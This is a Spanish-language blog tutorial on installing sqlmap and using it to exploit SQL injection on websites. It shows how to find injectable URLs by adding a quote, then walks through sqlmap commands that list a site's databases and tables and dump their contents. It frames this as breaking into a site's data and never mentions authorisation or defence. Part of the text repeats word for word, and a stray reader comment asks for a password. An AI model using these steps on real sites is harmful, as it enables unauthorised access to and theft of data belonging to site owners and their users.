En el siguiente tutorial aprenderemos como utilizar sqlmap para explotar la vulnerabilidad de un sitio web. Aquí la web del autor, se agradecen infinitamente las donaciones.
Yo usaré Ubuntu 13.10 para este tutorial.
Materiales
Linux (sqlmap.tar.gz)
Sqlmap
Windows (sqlmap.zip)
Python
Descargar
Ubuntu (SO)
Descargar
Instalar
Windows1.- Instalar Python
2.- Abrir el archivo y descomprimirlo en C:/sqlmap/
Linux (terminal)
1.- Abrir una nueva terminal y dirigirnos a la carpeta donde descomprimiremos sqlmap, yo lo haré en "/var/opt/"
cd /var/opt
2.- Descomprimir el archivo, yo lo descargué en "~/Documentos/", nos pedira la contraseña y comenzará a descomprimir
sudo tar -xzvf ~/Documentos/sqlmap.tar.gz
¡Finalmente Sqlmap Se instaló!
Encontrando la Vulnerabilidad
Primero necesitamos una url vulnerable, en su mayoría se parecen a esta "index.php?id=65" se puede comprobar añadiendo una comilla simple que provoca un error parecido a este:Una vez encontrada la vulnerabilidad tenemos que comprobar que es vulnerable:
linux:
sudo -sH (Importante ejecutar los comandos como root o Super User)
cd /var/opt/sqlmap
./sqlmap.py
Windows:
cd C:/sqlmap/
python sqlmap.py
Ejecutamos el comando para listar las bases de datos:
./sqlmap.py -u "URL VULNERABLE" --dbs
Si todo sale bien nos mostrará un mensaje como este, diciendo que el parámetro es vulnerable y nos pregunta si queremos seguir testeando otros:
Elegimos que no oprimiendo la tecla "N".
Explotando la vulnerabilidad
Una vez encontrada la vulnerabilidad el programa nos mostrará las bases de datos de el sitio, tales como las siguientes:
Tenemos las siguientes bases de datos:
available databases [2]: [*] dbkenwright
[*] information_schema
¡Hemos entrado a las bases de datos del sistema!
./sqlmap.py --help
Comprueba si el parametro es vulnerable y lista las bases de datos del sitio
./sqlmap.py -u "urlvulnerable.com/?id=12" --dbs
Lista las tablas del sitio
./sqlmap.py -u "urlvulnerable.com/?id=12" -D <DataBase> --tables
Muestra el contenido de las tablas
./sqlmap.py -u "urlvulnerable.com/?id=12" -D <DataBase> -T <table> --dump
Explotando la vulnerabilidad
Una vez encontrada la vulnerabilidad el programa nos mostrará las bases de datos de el sitio, tales como las siguientes:
Tenemos las siguientes bases de datos:
available databases [2]: [*] dbkenwright
[*] information_schema
¡Hemos entrado a las bases de datos del sistema!
Comandos
Les dejaré los comandos de lo que podemos hacer, de igual manera se pueden consultar con:./sqlmap.py --help
Comprueba si el parametro es vulnerable y lista las bases de datos del sitio
./sqlmap.py -u "urlvulnerable.com/?id=12" --dbs
Lista las tablas del sitio
./sqlmap.py -u "urlvulnerable.com/?id=12" -D <DataBase> --tables
Muestra el contenido de las tablas
./sqlmap.py -u "urlvulnerable.com/?id=12" -D <DataBase> -T <table> --dump
cual es la contraseña?
ResponderBorrar